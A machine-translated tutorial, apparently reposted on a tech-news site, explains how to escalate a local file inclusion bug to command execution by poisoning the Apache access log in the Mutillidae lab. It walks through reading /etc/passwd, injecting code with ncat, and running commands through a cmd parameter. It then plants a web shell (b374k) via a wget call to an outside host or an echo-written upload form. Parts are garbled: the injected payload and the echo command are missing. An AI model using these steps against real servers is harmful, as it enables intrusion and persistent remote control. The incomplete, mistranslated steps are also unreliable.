Shulou(Shulou.com)06/01 Report--

This article is about how to use APACHE ACCESS LOG to exploit LFI vulnerabilities. Xiaobian thinks it is quite practical, so share it with everyone to learn. I hope you can gain something after reading this article. Let's not say much. Let's take a look at it together with Xiaobian.

Local files contain (LFI) vulnerabilities, which are often used by intruders to extract the contents of different files on the server where the site is located, such as passwd, hosts, etc. But have you ever thought about taking it to another level? That is, the browser shell (c99, b374k, etc.) on the server is obtained through local file inclusion.

set

I'll use my local penetration test environment setup as an example. The web application I currently use is Mutillidae. In addition, we must configure Apache to allow directory traversal.

Options Indexesshow time

First we look for LFI vulnerabilities, click on the link we can see the following url address:

/index.php? page=

Let's try including a sensitive file path/etc/passwd and see what happens. As follows:

/index.php? page=/etc/passwd

He had actually successfully read the contents of the file! This also verifies that the app does have a local file inclusion vulnerability. Next, let's include the Apache access log and see if we can access its contents as well.

The location and file name of the access log varies from system to system, on my system it is/var/log/apache2/access.log. Modify the URL as follows:

/index.php? page=/var/log/apache2/access.log

That's great! The contents of the access log were also successfully loaded.

With the above initial validation, it is time to move on to our second phase.

Apache Access Log Utilization

Before that, you need to know something about Apache logs.

The server access log records all requests processed by the server.

Reference source: httpd.apache.org/docs/1.3/logs.html#accesslog

This also means that any requests we send to the server will be saved there.

First we open a terminal and then use netcat to send a GET request to the server. The reason we didn't use the browser to send this request is because it url-encodes our request, which would cause it to not work properly. The code we inject is as follows:

About the passthru() function:

passthru -Executes external programs and displays raw output

Reference source: php.net/passthru

To send a request using netcat, we need to do the following in the terminal:

ncat 192.168.56.101 80

Then we type the following:

GET / HTTP/1.1Host: 192.168.56.101Connection: close

Note: Here you must change 192.168.56.101 to the IP address of your target. This is the IP address of my virtual machine.

It should end up looking like this:

$ ncat 192.168.56.101 80GET / HTTP/1.1Host: 192.168.56.101Connection: close HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2014 17:34:53 GMTServer: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1Vary: Accept-EncodingContent-Length: 202Connection: closeContent-Type: text/html; charset=iso-8859-1 404 Not FoundNot Found The requested URL /< was not found on this server.

Now let's verify that our injection works, go back to the browser and add a new parameter to the URL:

cmd=

In our example, I will use the id command:

/index.php? page=/var/log/apache2/access.log&cmd=id

Now, let's look at the output we got. If you look closely, you will see something similar to the red box:

Our order was successfully executed on the server!

Here's our highlight, which is getting the browser shell of the server. There are two ways to do this, the first is to use wget and the second is to inject upload forms. Let's start with the first one.

Use WGET

Wget is a file download command. Although not always effective, the easiest way is the first one we need to try. Change the cmd parameter as follows:

&cmd=wget http://somedomain.com/shellfile.php

This will download shellfile.php to the server and save it in the current working directory (if readable). If you want to save it somewhere else, you can refer to the wget manual. This way, you can save yourself the intermediate step of uploading the form.

upload form

If wget doesn't work, we can use the upload form method. We will execute echo on the server, which will write our arbitrary content to a file. Change the cmd parameter as follows:

This creates a file on the server with the upload form. Then we open the upload page in our browser and upload our browser shell.

As shown below, we successfully uploaded the b374k shell.

process review

1. Verify LFI vulnerability by obtaining passwd, hosts and other files;

2. Apache log access via LFI vulnerability;

3. sending malicious requests using netcat or similar tools;

4. Verify code execution by testing simple commands such as id, whoami, etc.

5. Add the browser shell to the server using wget or by writing the upload form to the server;

6. Access the browser shell to verify success.

While this is not an ultra-high risk vulnerability in itself, it could pose a significant security threat if properly exploited.

The above is how to exploit the LFI vulnerability through APACHE ACCESS LOG. Xiaobian believes that some knowledge points may be seen or used in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.